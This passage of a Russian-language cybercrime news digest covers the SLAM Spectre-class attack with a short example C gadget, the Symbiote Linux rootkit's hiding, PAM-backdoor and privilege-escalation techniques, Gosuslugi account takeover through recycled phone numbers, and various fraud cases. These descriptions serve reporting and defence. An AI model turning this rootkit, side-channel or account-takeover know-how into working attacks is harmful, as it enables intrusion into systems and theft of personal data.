При этом исследователи отмечают, что по сравнению с процессорами Intel архитектура процессоров AMD ограничивает возможность проведения реальных атак, но не исключает применение нового метода в комбинации с другими микроархитектурными атаками для повышения их эффективности. В частности, предложенный вариант атаки не позволяет определить содержимое областей памяти ядра и других процессов, а ограничивается возможностью получить доступ к другим потокам той же программы, выполняемым в одном пространстве виртуальной памяти.
Так как программа из без уязвимости имеет возможность получить доступ к своим потокам, то с практической стороны метод представляет интерес для обхода sandbox-изоляции и организации вмешательства в работу других потоков в программах, допускающих выполнение стороннего кода, таких как web-браузеры и JIT-движки. Исследователи изучили подверженность атаке JavaScript-движка SpiderMonkey и ядра Linux, но не нашли уязвимых последовательностей кода, при помощи которых можно было бы совершить атаку. Помимо атаки на приложения метод также может применяться для форсирования недопустимых потоков данных между микроархитектурными элементами процессора в процессе эксплуатации других микроархитектурных уязвимостей.
Посмотрели эту статью? Микрософт занимается тэйкдаунами!

jeopardized lives ](https://news.microsoft.com/source/features/work- life/inside-the-fight-against-hackers-who-disrupted-hospitals-and-jeopardized- lives/)
 news.microsoft.com
В январе текущего года в полицию поступило заявление от жительницы Барнаула о том, что неизвестные незаконно получили доступ к ее личному кабинету на портале «Госуслуги», что повлекло модификацию информации, охраняемой законодательством. По данному факту было возбуждено уголовное дело по части 2 статьи 272 УК РФ «Неправомерный доступ к компьютерной информации».
Сотрудники отдела по борьбе с противоправным использованием информационно- коммуникационных технологий ГУ МВД России по Алтайскому краю в ходе оперативно-розыскных мероприятий выехали в служебную командироку и при силовой поддержке спецподразделения Росгвардии задержали ранее судимого за кражу жителя Воронежской области, причастного к совершению преступления, связанного с несанкционированным доступом к информации. При обыске у него изъяли четыре мобильных телефона, пять жестких дисков, три флешнакопителя, более 300 сим- карт различных операторов связи, список, в который входило более 1000 номеров абонентов, которые могли стать потенциальными жертвами преступления, банковские карты.
В ходе предварительного расследования установлено, что подозреваемый вступил в чаты в одном из мессенджнров и стал выполнять определенные задания. Он получал номера мобильных телефонов, с которых граждане регистрировалали личные кабинеты на «Госуслугах», но по каким-то причинам переставали ими пользоваться, а номер телефона, внесенный на портал, не меняли. Спустя полгода неиспользования номера абонентом, сотовый оператор реализовывал его вновь. Именно такие номера приобретал потенциальный преступник, с помошью которых взламывал личные страницы. Он менял абонентский номер на тот, который был необходим ему, получал неправомерный доступ к личным кабинетам граждан и получал реквизиты их паспортов, СНИЛСов, ИНН. После передавал взломанную учетную запись личного кабинета «Госуслуг» сообщникам. Таким образом впоследствии на ничего не подозревающих владельцев личных кабинетов путем различных манипуляций в банках и микрофинансовых организациях незаконно оформялись кредиты. Кроме того, подозреваемый оформил на себя порядка 40 карт разных банков, реквизиты которых также предоставлял за вознаграждение потенциальным мошенникам, которые выводили туда деньги, полученные преступным путем.
Проводятся дальнейшие оперативно-розыскные мероприятия и следственные действия, направленные на установление дополнительных эпизодов противоправной деятельности и личностей всех участников преступной цепочки.
Группа исследователей из Амстердамского свободного университета представила новую технику атаки SLAM (Spectre Linear Address Masking), предлагающую новый способ эксплуатации микроархитектурных уязвимостей класса Spectre, в котором утечка данных происходит при трансляции неканонических адресов, а для обхода проверок каноничности привлекаются предоставляемые в новых процессорах расширения для маскировки линейных адресов. Исследователями опубликован инструментарий с реализацией метода и предложена демонстрация, показывающая как можно извлечь из памяти ядра данные, соответствующие определённой маске (показано как за несколько десятков секунд в Ubuntu выделить из памяти ядра строку с хэшем пароля пользователя root).
Атака может быть совершена на системах с процессорами Intel, поддерживающими расширение LAM (Linear Address Masking), процессорами AMD с расширением UAI (Upper Address Ignore) и процессорами ARM с расширением TBI (Top Byte Ignore). Указанные расширения позволяют использовать часть битов 64-разрядных указателей для хранения не связанных с адресацией метаданных (для обычных программ не требуется столько памяти, что могут адресовать 64-разрядные указатели, поэтому верхние биты могут быть задействованы, например, для проверок, связанных с обеспечением безопасности). Интересно, что процессоры Intel, AMD и ARM с поддержкой LAM, UAI и TBI ещё только анонсированы, но массово не производятся, что делает SLAM первой спекулятивной атакой на будущие CPU. Атака также может быть совершена на старых CPU AMD Zen+ и Zen 2, подверженных уязвимости CVE-2020-12965.
По аналогии с эксплуатацией уязвимостей Spectre для осуществления атаки SLAM требуется наличие в ядре определённых последовательностей инструкций (гаджетов), приводящих к спекулятивному выполнению инструкций. Подобные инструкции приводят к спекулятивному чтению данных из памяти в зависимости от внешних условий, на которые может влиять атакующий. После определения ошибочного прогноза результат спекулятивного выполнения отбрасывается, но обработанные данные остаются в кэше и могут затем быть извлечены при помощи анализа по сторонним каналам. Для извлечения осевших в кэше данных исследователями задействован метод Evict+Reload, основанный на создании условий для вытеснения данных из кэша (например, создаётся активность, равномерно заполняющая кэш типовым содержимым) и выполнения операций, время выполнения которых позволяет судить о наличии данных в процессорном кэше.
Для совершения атаки SLAM используются гаджеты на основе кода, в котором контролируемые атакующим данные (ниже переменная "secret") используются как указатель. Например:
Code:Copy to clipboard
void unmasked_gadget(long **secret) {
**secret;
}
Отмечается, что подобные шаблоны кода часто используются в программах, например, в ядре Linux выявлены десятки тысяч таких гаджетов, из которых как минимум несколько сотен пригодны для использования в эксплоитах. Утечка может быть блокирована через добавление в подобные гаджеты дополнительных инструкций, блокирующих спекулятивное выполнение. Компания Intel намерена предоставить программный метод блокирования утечки до начала поставки процессоров с поддержкой LAM. Компания AMD рекомендовала использовать существующие методы блокирования атак класса Spectre v2. Разработчики ядра Linux для защиты от атаки решили отключить по умолчанию поддержку LAM до публикации рекомендаций Intel по блокированию уязвимости.
Бывший глава Лайтбанка объявлен в федеральный розыск, его подозревают в хищении около $8 млн в 2016–2017 годах. В последующие годы ЦБ отозвал лицензию у банка в связи с высокорискованной бизнес-моделью.
Бывший председатель правления Лайтбанка Константин Тогузаев заочно арестован
по делу о мошенничестве в особо крупном размере, карточка появилась в базе
Таганского суда Москвы.
По данной статье (ч. 4 ст. 159 УК) ему грозит до десяти лет лишения свободы.
Тогузаеву вменяют хищение со счетов «Спецметропроекта» около $8 млн, эта организация была VIP-клиентом Лайтбанка. Следствие полагает, что часть суммы в 2016 и 2017 годах продали девяти физлицам, остальные деньги перевели на счет «Мосстройреставрации» в том же Лайтбанке. Подписи покупателей валюты были подделаны, а учредителем «Мосстройреставрации» до осени 2021-го был сам Тогузаев.
Телефонные мошенники убедили 12-летнюю девочку из Москвы отправить им 375 тысяч на лечение бабушки.
Отмечается, что инцидент произошёл ещё 21 ноября. Сначала девочке позвонили с незнакомого номера на домашний телефон — в трубку сильно плакал женский голос. Девочка не поняла, кто это был, но голос был похож на голос её бабушки. После этого мошенники позвонили второй раз, но уже на мобильный. Девочке рассказали, что её бабушка попала под колёса автомобиля и получила серьёзные травмы. На лечение мошенники потребовали попросили 600 тысяч рублей, а также продиктовали инструкции — девочка должна была собрать бабушке в больницу не только деньги, но и полотенце, постельное бельё и бумагу. После этого к дому ребёнка послали курьера.
Требуемой суммы девочка не нашла, но смогла собрать 375 тысяч рублей. Деньги и больничные принадлежности ребёнок послушно передал кульеру, найти которого пока не удалось. О произошедшем быстро узнали родители девочки — в данный момент поиском мошенников занимается полиция Москвы.
Правоохранители доказали причастность злоумышленника к совершению мошеннических действий в отношении 28 граждан и более 430 тысяч гривен нанесенного им ущерба. Дальнейшую судьбу фигуранта решит суд.
Противоправную деятельность злоумышленника разоблачили оперативники Вознесенского райуправления полиции совместно с отделом уголовного анализа областного главка в начале июля прошлого года.
В ходе досудебного расследования полицейские установили, что 20-летний житель Вознесенска на одной из интернет-платформ размещал объявления о продаже мототехники и генераторов. От желающих приобрести товар злоумышленник получал полную или частичную оплату на банковские счета посторонних лиц. Однако взятых на себя обязательств не выполнял и прекращал связи с покупателями сразу после перечисления средств на его счет. Чтобы скрыть свою преступную деятельность, парень использовал паспортные данные и номера банковских карточных счетов своих знакомых.
По месту жительства фигуранта полицейские провели санкционированный обыск. Во время которого обнаружили и изъяли банковские карточки, сим-карты и мобильные телефоны, в которых содержались доказательства преступной деятельности. Все изъятое правоохранители направили на проведение экспертных исследований, которые доказали его причастность к совершенным преступлениям.
При процессуальном руководстве Вознесенской окружной прокуратуры следователи полиции сообщили фигуранту о подозрении по ч.ч. 2, 3 ст. 190 УК Украины «Мошенничество» и ч.ч. 1, 2 ст. 182 УК Украины «Нарушение неприкосновенности частной жизни». Санкции указанных статей предусматривают наказание в виде лишения свободы на срок до трех лет.
Следователи полиции закончили расследование и направили уголовное производство в прокуратуру, которая направила обвинительный акт в суд для рассмотрения по существу и принятия решения согласно нормам действующего законодательства.
Ориентированные на детей интернет-аферы набирают всё большую популярность в США.
За последние пять лет тысячи сайтов госучреждений США, ведущих университетов и профессиональных организаций были взломаны и использовались для продвижения правдоподобных, но мошеннических предложений и акций. Многие из этих афер были направлены на детей и пытались обманом заставить их скачивать приложения, вредоносное ПО и даже добровольно предоставлять свои личные данные в обмен на несуществующие вознаграждения в Fortnite и Roblox.
Уже более трёх лет исследователь кибербезопасности Зак Эдвардс из Human Security отслеживает подобные аферы. По его словам, эта деятельность связана с пользователями одной конкретной рекламной компании CPABuild, зарегистрированной в США. Компания выступает в качестве сервиса, который направляет веб-трафик к ряду онлайн-рекламодателей, позволяя отдельным лицам регистрироваться и использовать её системы, судя по всему, не сильно волнуясь о безопасности интернет-пользователей.
Каждый день Эдвардс обнаруживает десятки взломанных доменов «.gov», «.org» и «.edu». Вот, что он думает по поводу хакеров, стоящих за этой угрозой: «Эта группа злоумышленников, по моему мнению, является номером один по массовой компрометации инфраструктуры в Интернете, использованию мошеннических схем и других видов вредоносной эксплуатации». Масштаб продолжающихся взломов и публичный характер афер сильно выделяют группировку над остальными интернет- злоумышленниками, отмечает исследователь.
Схемы и способы заработка хакеров сложны, однако каждый из сайтов взламывается аналогичным образом. В основном злоумышленники используют уязвимости или слабые места в бэкенде или системе управления контентом (CMS), чтобы загрузить на сайт вредоносные PDF-файлы.
Эти документы, которые Эдвардс называет «отравленными PDF», предназначены для появления в поисковых системах и продвижения «бесплатных скинов Fortnite», «генераторов игровой валюты Roblox» или «трансляций популярных фильмов», таких как «Барби» и «Оппенгеймер». PDF-файлы содержат сотни ключевых слов, поэтому многие люди так или иначе выйдут на заражённый сайт.
Когда жертва скачивает вредоносный PDF-файл и переходит по ссылке внутри него, она перенаправляется через несколько сайтов, и попадает в конечном итоге на мошеннические целевые страницы. При этом, как отмечает исследователь, существует «множество целевых страниц, кажущихся очень ориентированными на детей».
На изображении выше демонстрируется мошеннический сервис якобы для генерации внутриигровой валюты Roblox. Тут игрока просят ввести свой никнейм и указать операционную систему, после чего можно будет получить столько бесплатных монет, сколько доверчивый геймер пожелает, однако тут и кроется главный подвох.
Всплывающее окно с надписью «Последний шаг!» гласит, что бесплатные игровые монеты будут разблокированы, только если жертва зарегистрируется уже в другом сервисе, введёт там свои личные данные или скачает вредоносное приложение. Однако и эти действия не приводят к получения желаемой награды, а вот мошенники вполне могут заработать, продав личные данные пользователя в даркнете.
Такие аферы существуют уже давно, но эти выделяются тем, что так или иначе связаны с рекламной компанией CPABuild и её участниками, говорит Эдвардс. Все взломанные сайты, на которых загружены PDF-файлы, обращаются к C2-серверам, принадлежащим CPABuild.
Можно решить, что CPABuild — изначально мошенническая компания, которая каким- то образом просуществовала безнаказанно уже много лет, однако и тут есть нюанс. «CPA» в названии компании расшифровывается как «Cost Per Action» или «плата за действие». Компания была создана для продвижения подобных объявлений на вполне законных условиях, но вряд ли у её специалистов есть физическая возможность контролировать каждое мошенническое объявление.
На веб-сайте компании утверждается, что специалисты проводят «ежедневные» проверки на мошенничество, чтобы поймать кибернегодяев, злоупотребляющих платформой, а условия предоставления услуг в принципе запрещают клиентам сервиса участвовать в мошеннической деятельности. Тем не менее, исследование Эдвардса показывает, что какие бы усилия в действительности ни предпринимала CPABuild, это пока что не привело к заметному результату.
Сам исследователь говорит, что схема так и может остаться безнаказанной, поскольку все вредоносные ссылки в процессе компрометации передаются через службы перенаправления, которые маскируют личность злоумышленников. Кроме того, похитители данных, тем более работающие на добровольной основе, могут и вовсе остаться незамеченными, поскольку ущерб от них не так очевиден и нагляден, как от тех же программ-вымогателей.
Тем временем, об использовании компании CPABuild в мошеннических схемах известно уже давно. Тот же Эдвардс из Human Security привлекал внимание CISA к взломанным правительственным сайтам и посредничеству CPABuild в атаках, однако это не привело к видимым результатам.
CPABuild также неоднократно обсуждался на киберпреступных форумах, поэтому множество хакеров прекрасно осведомлены о том, как можно использовать данную платформу в своих целях. «Многие пользователи ищут инструкции о том, как пройти одобрение в CPABuild, а также об аккаунтах в CPABuild, которые они могут купить» — сообщает директор по исследованию угроз компании KELA.
Так или иначе, сколько бы жалоб интернет-пользователи и исследователи не оставляли на CPABuild, прикрыть контору насовсем без веских оснований в США, видимо, не могут. Это во многом напоминает историю про использование Telegram различного рода злоумышленниками. Хотя едва ли у CPABuild можно найти какие- либо положительные стороны, сделавшие жизнь интернет-пользователей лучше и удобнее, чего уже не скажешь о том же Telegram.
Эта история наглядно показывает, что Интернет по-прежнему остаётся местом, полным опасностей. Особенно для детей, которые могут без колебаний слить данные о себе или своих родителях за сотню-другую «робаксов».
Родителям стоит быть особенно бдительными, объясняя своим детям, что обещания чего-то слишком хорошего, чтобы быть правдой, очень часто оказываются ловушками мошенников. Дети должны знать, что никогда не стоит вводить личную информацию или скачивать приложения ради обещанных онлайн-наград.
Мы также видим, что компании, подобные CPABuild, должны нести куда большую ответственность за мониторинг мошеннической деятельности на своих платформах, чтобы защитить пользователей интернета.
Жителю американского Бирмингема (штат Алабама) предъявлено обвинение в создании схемы с поддельными и крадеными чеками, которая позволила украсть более 15 миллионов долларов у предприятий, церквей, школ, коммунальных служб, благотворительных организаций и частных лиц. Согласно обнародованному федеральному уголовному делу. 23-летнему Мехи Дивону Харрису (Mekhi Diwone Harris) предъявлено обвинение в сговоре с целью совершения банковского мошенничества.
«Я подсчитала, что общая стоимость чеков, размещенных в Telegram-канале Work Related Slips в период с 22 октября 2022 года по 8 августа 2023 года, составляет более 15,1 миллиона долларов», — написала в судебных документах специальный агент ФБР Меган Гроуз (Megan Grose), которая занималась расследованием дела.
Оно показало, что Харрис фотографировал украденные чеки и размещал отредактированные копии в Telegram-канале, где любой подписчик мог заполучить оригинальную версию. Оплату он принимал через Cash App и криптовалютными платежами. При этом точная сумма денег, которые получил именно Харрис, остается неизвестной, но временами его баланс в Cash App превышал отметку в 100 тысяч долларов. При этом в один только день — 8 августа 2023 года — владелец канала выложил в него 13 чеков на общую сумму около 190 тысяч долларов.
Записи Amazon также доказывают, что по крайней мере с июня 2021 года по август 2022 года Харрис использовал свою учетную запись для покупки расходных материалов, необходимых для изготовления поддельных чеков. В числе прочего речь идет о чернильных картриджах и тонере, совместимых с чеками. Обвиняемый находится под стражей.
source: msn.com/en-us/news/us/birmingham-man-charged-in-15-million-app-based- check-fraud-targeting-churches-charities/ar-AA1f26K8
В СК Армении завершено предварительное следствие по части еще 8 обвиняемых в рамках уголовного производства, инициированного по факту случаев хищения особо крупных сумм, принадлежащих банку, и отмывании денег.
Отметим, что специалист отдела по обслуживанию пластиковых карт одного из коммерческих банков Армении Г.К. в период с апреля по ноябрь 2021 года, придя к предварительной договоренности с сотрудником ЗАО «Инкассаторская служба Армения», в процессе работы с банкоматами похитил особо крупные суммы наличных денег - на общую сумму в 1 608 762 000 драмов (160 случаев).
Часть относительно упомянутого лица из банка еще в 2022 году была отделена в
отдельное производство и материалы уголовного производства с обвинительным
заключением переданы в суд.
Как выяснилось, последний похищал деньги не один.
Кроме того, была получена фактическая информация о том, что действовала организованная преступная группа, состоящая из инкассаторов, других банковских служащих, а с целью легализации денег, полученных преступным путем, в нее также были вовлечены брат Г.К. и друг последнего.
По фактическим данным, полученным в ходе следствия, установлены все обстоятельства нескольких десятков похищений, совершенных группой лиц по предварительному сговору, в том числе личности еще восьми лиц, причастных к преступлению, размеры суммы денег, украденных ими из каждого из банкоматов на всей территории РА, механизмы похищения и др.
Затем, чтобы скрыть преступное происхождение украденных денег, Г.К. приобретал под именами своих родственников движимое и недвижимое имущество. Одновременно брат последнего с целью сокрытия преступного происхождения похищенных средств приобретал движимое имущество в особо крупном размере, после чего при содействии своего друга обменивал это самое движимое имущество - отмывал деньги.
По данным фактам трем инкассаторам и специалисту отдела техобслуживания банка предъявлено обвинение по пункту 3 части 3 статьи 256, сотруднику службы безопасности банка – по пункту 3 части 3 статьи 44-256, главному специалисту отдела обслуживания клиентов банка – по части 1 статьи 474, брату сотрудника банка – по пункту 3 части 3 статьи 296, а другу последнего – по пункту 3 части 3 статьи 44-296 УК Армении. В отношении всех обвиняемых избрана мера пресечения в виде запрета на отсутствие.
Тысячи пользователей Инстаграма получили письма с грамматическими ошибками и предложением обзавестись галочкой к своему профилю. Достаточно подтвердить аккаунт, слив логин, почту, телефон и пароль.
Домен под верификационный, знакомые логотипы, ограничения по времени в письме напополам с чувством гордости и достижения — всё для заманухи желающих поднять свой сетевой соцстатус инстадив. Злоумышленники не первый раз пытаются сыграть на тщеславии твиттерно-инстаграмных пользователей — такие кампании стабильно идут каждый год. Шутка ли, заветная голубая галочка как у лучших людей платформы.
Source: <https://www.vadesecure.com/en/blog/instagram-phishing-campaign- hackers-exploit-social-verification>
Следователями УМВД России по Астраханской области завершено расследование уголовного дела по обвинению двух жительниц Свердловской области 1976 и 2000 года рождения в мошенничестве в отношении 56 жителей из 18 регионов России. Уголовное дело в отношении двоих сообщников обвиняемых – жителей Челябинска и Москвы – находится в стадии расследования.
Установлено, что в период с 2020 по 2021 год злоумышленницы вместе с подельниками создавали в популярной социальной сети страницы якобы интернет- магазинов, занимающихся продажей различных товаров: мебели, одежды, обуви, подарочных и игровых наборов и др. Из Интернета они скачивали фотографии необходимых изделий и загружали в аккаунты с подробным описанием. Когда потенциальный покупатель выходил на связь, ему высылали дополнительные фото и информацию о наличии товара. Главным условием сделки была полная оплата заказа. Получив деньги, аферисты блокировали страницы покупателей, чтобы они в дальнейшем не смогли написать или позвонить.
Так, 33-летняя жительница Астрахани заказала на сайте мошенников подвесное кресло. Сразу после этого ей пришёл номер счёта, на который она перевела 4 900 рублей. Через два дня женщина зашла в переписку с магазином, чтобы уточнить, на какой стадии заказ, но увидела, что она добавлена в чёрный список и связаться с продавцом не может.
В ходе расследования уголовного дела астраханские полицейские выявили ещё 55 фактов аналогичных мошеннических действий, совершённых обвиняемыми и их сообщниками. Жертвами стали жители Астрахани, Волгограда, Воронежа, Иркутска, Екатеринбурга, Липецка, Краснодара, Санкт-Петербурга, Владимира, Коврова, Нижнего Новгорода, Майкопа, Саратова, Омска, Оренбурга, республик Марий Эл, Татарстан и Чечня.
Астраханские следователи и оперативники осуществили 30 выездов в регионы проживания подозреваемых и потерпевших, проведя в командировках в общей сложности более трёх месяцев.
По версии следствия, у 56 потерпевших злоумышленниками было похищено более 312
тысяч рублей. В целях возмещения причинённого ущерба наложен арест на квартиру
одной из фигуранток.
В настоящее время уголовное дело направлено в прокуратуру для решения вопроса
об утверждении обвинительного заключения.
Злоумышленник шантажировал пользователей соцсети «ВКонтакте» сливом личных данных и переписок.
В Калужской области перед судом предстанет 20-летний молодой человек, уроженец Московской области, обвиняемый в вымогательстве у пользователей соцсети.
Как сообщает пресс-служба областной прокуратуры, находясь в Калуге, молодой человек установил программу, через которую получил доступ к личной информации пользователей соцсети “ВКонтакте”. В дальнейшем, угрожая распространить информацию, он требовал от пользователей деньги. Общий ущерб, причиненный потерпевшим, – более 160 тысяч рублей.
Всего было зафиксировано 17 эпизодов неправомерного доступа к охраняемой законом частной информации пользователей.
В пресс-службе ведомства рассказали, что кибермошенник собирал личные данные и получал доступ к перепискам с помощью специального программного обеспечения. Он вымогал у потерпевших деньги и в случае отказа угрожал выложить полученные им данные в открытый доступ.
Молодому человеку грозит до четырех лет лишения свободы.
Исследователи из компаний Intezer и BlackBerry обнаружили вредоносное ПО, получившее кодовое имя Symbiote и используемое для внедрения бэкдоров и rootkit-ов на скомпрометированные серверы, работающих под управлением Linux. Вредоносное ПО было выявлено на системах финансовых учреждений ряда стран Латинской Америки. Для установки Symbiote в систему атакующий должен иметь root-доступ, который может быть получен, например, в результате эксплуатации неисправленных уязвимостей или утечки учётных записей. Symbiote позволяет закрепить своё присутствие в системе после взлома для проведения дальнейших атак, скрытия активности других вредоносных приложений и организации перехвата конфиденциальных данных.
Особенностью Symbiote является распространение в форме разделяемой библиотеки, которая подгружается во время запуска всех процессов при помощи механизма LD_PRELOAD и подменяет некоторые вызовы стандартной библиотеки. Обработчики подменённых вызовов скрывают связанную с бэкдором активность, например, исключают отдельные элементы в списке процессов, блокируют доступ к определённым файлам в /proc, скрывают файлы в каталогах, исключают вредоносную разделяемую библиотеку в выводе ldd (выполняется перехват функции execve и анализ вызовов с переменной окружения LD_TRACE_LOADED_OBJECTS), не показывают связанные с вредоносной активностью сетевые сокеты. Для защиты от инспектирования трафика осуществляется переопределение функций библиотеки libpcap, фильтрация чтения /proc/net/tcp и подстановка дополнительного кода в загружаемые в ядро BPF-программы, что позволяет скрыть сетевую активность бэкдора от анализаторов, запускаемых на той же системе позднее.
Symbiote также позволяет обойти некоторые анализаторы активности в файловой системе, так как кража конфиденциальных данных может осуществляться не на уровне открытия файлов, а через перехват операций чтения из этих файлов в легитимных приложениях (например, подмена библиотечных функций позволяет перехватить ввод пользователем пароля или загружаемые из файла данные с ключом доступа). Для организации удалённого входа Symbiote перехватывает некоторые PAM-вызовы (Pluggable Authentication Module), что позволяет подключиться к системе через SSH с определёнными атакующими учётными данными. Предусмотрена также скрытая возможность повышения своих привилегий до пользователя root через установку переменной окружения HTTP_SETTHIS.
Источник: https://www.opennet.ru/opennews/art.shtml?num=57328
Участники сообщества Kernal выявили необыкновенно беспечное отношение к безопасности в дистрибутиве Linuxfx, предлагающем сборку Ubuntu с пользовательским окружением KDE, стилизованным под интерфейс Windows 11. По данным с сайта проекта дистрибутивом пользуется более миллиона пользователей, а за эту неделю зафиксировано около 15 тысяч загрузок. Дистрибутив предлагает активацию дополнительных платных возможностей, которая производится через введение лицензионного ключа в специальном графическом приложении.
Исследование приложения для активации лицензии (/usr/bin/windowsfx-register) показало, что оно включает в себя вшитые логин и пароль для обращения к внешней СУБД MySQL, в которую добавляются данные о новом пользователе. Обнаруженные учётные данные позволяют получить полный доступ к БД, в том числе к таблице "machines" в которой отражены сведения о всех установках дистрибутива, включая IP-адреса пользователей.
Доступно также содержимое таблицы "fxkeys" с лицензионными ключами и адресами электронной почты всех зарегистрированных коммерческих пользователей. Примечательно, что в отличие от заявлений о миллионе пользователей, в БД имеется лишь 20 тысяч записей. Приложение написано на языке Visual Basic и выполняется с использованием интерпретатора Gambas.
Отдельного внимания заслуживает [реакция](https://kernal.eu/posts/linuxfx- part-2/) разработчиков дистрибутива. После публикации сведений о проблемах с безопасностью они выпустили обновление, в котором не устранили саму проблему, а лишь поменяли имя БД, логин и пароль, а также изменили логику получения учётных данных и попытались бороться с трассировкой программы. Вместо вшитых в само приложение учётных данных, разработчики Linuxfx добавили загрузку параметров подключения к БД с внешнего сервера, используя утилиту curl. Для защиты после запуска реализован поиск и удаление всех запущенных процессов "sudo", "stapbp" и "*-bpfcc" в системе, видимо, полагая, что таким образом они смогут помешать работе программ для трассировки.
Управление по борьбе с экономическими преступлениями арестовало латвийца,
подозреваемого в серьезном мошенничестве с криптовалютой в Испании. По оценкам
испанских борцов с киберпреступностью, жертвами молодого человека стали около
тысячи человек, украдено было не менее полумиллиона долларов.
Десять лет назад США потребовали экстрадиции Карлиса Карклиньша за кражу денег
у клиентов американских банков, но благодаря странному решению Верховного суда
Латвии Карклиньш избежал наказания.
"Полиция арестовала 30-летнего криптомошенника из Латвии, подозреваемого в краже у испанских граждан более полумиллиона евро" - такая информация была опубликована неделю назад. Испанская полиция заявляет, что мошенник останавливался на эксклюзивном курорте на Средиземном море и наслаждался роскошным образом жизни.
Nekā personīga известно, что разыскиваемый Гражданской гвардией Испании - гражданин Латвии Карлис Карклиньш.
По данным испанской полиции, Карклиньш является автором схемы мошенничества - криптовалютного проекта под названием Hodlife - Unicorn token. В качестве публичного лица он везде представлялся гражданином Швейцарии, который предлагает инвесторам купить стартовые наборы и обещает прибыль, как только проект будет запущен на свободном рынке. Инвесторов привлекали с помощью активных кампаний на различных цифровых платформах.
Этим летом инвесторы Hodlife обнаружили, что их деньги исчезли, и поняли, что их обманули.
Гражданин Швейцарии оказался наемным испанским актером.
Несколько обманутых обратились в полицию, и так началось расследование. Выяснилось, что полмиллиона было переведено на один анонимный цифровой адрес.
Анализируя интернет-соединения, полиция обнаружила, что мошенник находился в одном из самых престижных районов Испании, в провинции Малага на Коста-дель- Соль. Он арендовал трехэтажные виллы более чем за 1000 евро в день, дорогие автомобили и тратил огромные суммы в дизайнерских магазинах и ресторанах.
Для доступа к сайтам с криптовалютой и перевода украденных средств нередко использовался доступ в Интернет в отелях. Для сделок использовались документы на имя несуществующего гражданина Литвы.
До октября Гражданская гвардия не знала, что разыскиваемый литовец - на самом деле гражданин Латвии Карлис Карклиньш.
Nekā personīga владеет информацией, что Управление по борьбе с экономическими преступлениями арестовало Карклиньша 18 октября этого года в Риге. 20 октября он был заключен под стражу. Карклиньш планировал через несколько дней вылететь в Амстердам на частном самолете, чтобы отметить день рождения своей девушки.
Во время операции по задержанию выяснилось, что и Карлис, и его девушка ехали на дорогих машинах. Несколькими днями ранее Карклиньш передвигался по Риге на синем Lambourghini.
Десять лет назад Соединенные Штаты требовали выдать Карклиньша за кражу личных данных и мошенничество на сумму более миллиона долларов. Ему грозило от пяти до пятнадцати лет тюрьмы. Однако наш Верховный суд, состоящий из трех судей, не согласился на экстрадицию тогда еще 20-летнего Карклиньша.
США обвинили Карклиньша в участии в международной группе, которая обманным путем украла у клиентов американских банков 1,3 миллиона долларов. Группа якобы создавала поддельные веб-страницы, благодаря которым получала доступ к именам пользователей и паролям. Карклиньш вместе с шестью другими обвиняемыми использовал эти данные для доступа к банковским счетам. Они также выманили деньги у нескольких компаний, зарегистрировавшись как их сотрудники и получая таким образом зарплату. Карклиньш использовал имена Сюзанн О'Нил, Крис и Стивен Бинг.
Поскольку часть преступлений была совершена в то время, когда Карклиньш действовал в Латвии, решение о его экстрадиции в США не было принято. Кроме того, у обвиняемого в прошлом было диагностировано психическое расстройство, поэтому его немедленно освободили.
Прокурор Отдела международного сотрудничества Марцис Вилюмс хорошо помнит этот случай спустя 10 лет.
Это было одно из первых дел о компьютерном мошенничестве международного масштаба в Латвии.
И хотя прокурор постановил, что доказательств достаточно, суд решил иначе.
После спасения от экстрадиции Карклиньш остался в Латвии и жил на широкую ногу
Карклиньш арендовал частные самолеты и регулярно посещал в том числе Латвию, где ездил на дорогих машинах по улицам Риги.
Подразделение по борьбе с киберпреступностью ENAP неоднократно проводило пресс-конференции, чтобы сообщить о констатированных полицией киберпреступлениях, совершенных нашими гражданами. Что могло быть причиной того, что ENAP все эти годы не обращал внимания на человека без легального дохода, ведущего при этом невероятно роскошный образ жизни? Версии могут быть разными. Прокурор, который 10 лет назад пытался экстрадировать Карклиньша в США, говорит, что против него было возбуждено несколько дел, но ни одно из них не закончилось обвинительным приговором или они просто не дошли до суда и были закрыты из-за срока давности. На этот раз Карклиньша подозревают в легализации незаконно полученных средств, а расследование выясняет, в результате каких преступлений они были получены.
Государственная полиция не дала интервью, но подтвердила, что сотрудники 1-го отдела ENAP подозревают Карклиньша в отмывании денег в особо крупных размерах, а расследование объясняет преступление.
Однако на выходных ENAP опубликовал информацию о задержании еще одного гражданина Латвии, которого за преступления в электронной среде также требуют выдать Соединенные Штаты.
Правонарушения задокументировали следователи Главного следственного управления Нацполиции по информации Департамента киберполиции.
В киберполицию обратился представитель частной компании, базы данных которой распространялись в сети Интернет. Благодаря своевременному информированию и взаимодействию с частным сектором правоохранители пресекли преступную деятельность 23-летнего жителя Киевской области.
Фигурант в сети Интернет на специализированных хакерских форумах размещал предложения по сбыту конфиденциальной информации. Стоимость колебалась от 300 до 400 долларов в зависимости от количества данных.
Также фигурант предоставлял услуги так называемого «пробива», которые заключались в сбыте персональных данных по требованию третьих лиц.
Правоохранители провели обыски по месту жительства фигуранта. По результатам изъяли компьютерную технику и мобильные терминалы, которые использовались для совершения преступления.
Во время предварительного осмотра изъятой техники киберполицейские обнаружили многочисленные базы данных коммерческих учреждений Украины. Базы данных насчитывали персональную информацию относительно пол миллиона клиентов. В них содержались сведения о дате рождения, фамилии, имени и отчестве граждан, серий и номеров паспортов, индивидуальных налоговых номеров налогоплательщиков и номеров телефонов.
Сейчас базы персональных данных изъяты из незаконного оборота. Учетные записи, которые использовались для преступной деятельности, заблокированы.
По данному факту открыто уголовное производство по ч. 2 ст. 361-2 (Несанкционированные сбыт или распространение информации с ограниченным доступом, которая хранится в компьютерах, автоматизированных системах, компьютерных сетях или на носителях такой информации) Уголовного кодекса Украины. Санкция статьи предусматривает лишение свободы на срок от двух до пяти лет.
Следственные действия продолжаются.
В результате оперативно-розыскных мероприятий сотрудники полиции задержали криминальную группу, состоявшую из четверых ранее судимых жителей города Лодейное Поле Ленинградской области в возрасте от 31 до 34 лет, которые подозреваются в серии дистанционных мошенничеств.
Установлено, что соучастники открыли на подставных лиц банковские счета и зарегистрировали более 70 сим-карт, с которых осуществляли звонки жителям разных регионов Российской Федерации. Собеседникам они представлялись сотрудниками правоохранительных органов или кредитных организаций и вводили их в заблуждение. Одним они сообщали, что их родственники стали виновниками ДТП, другим – что с их счетов неизвестные похищают сбережения.
Подельники убеждали потерпевших переводить деньги на открытые аферистами счета. Установлена причастность сообщников к хищению путём обмана 3 млн рублей у жителя Новосибирска. Однако, по версии полиции, жертвами подельников могут быть не менее 9 человек.
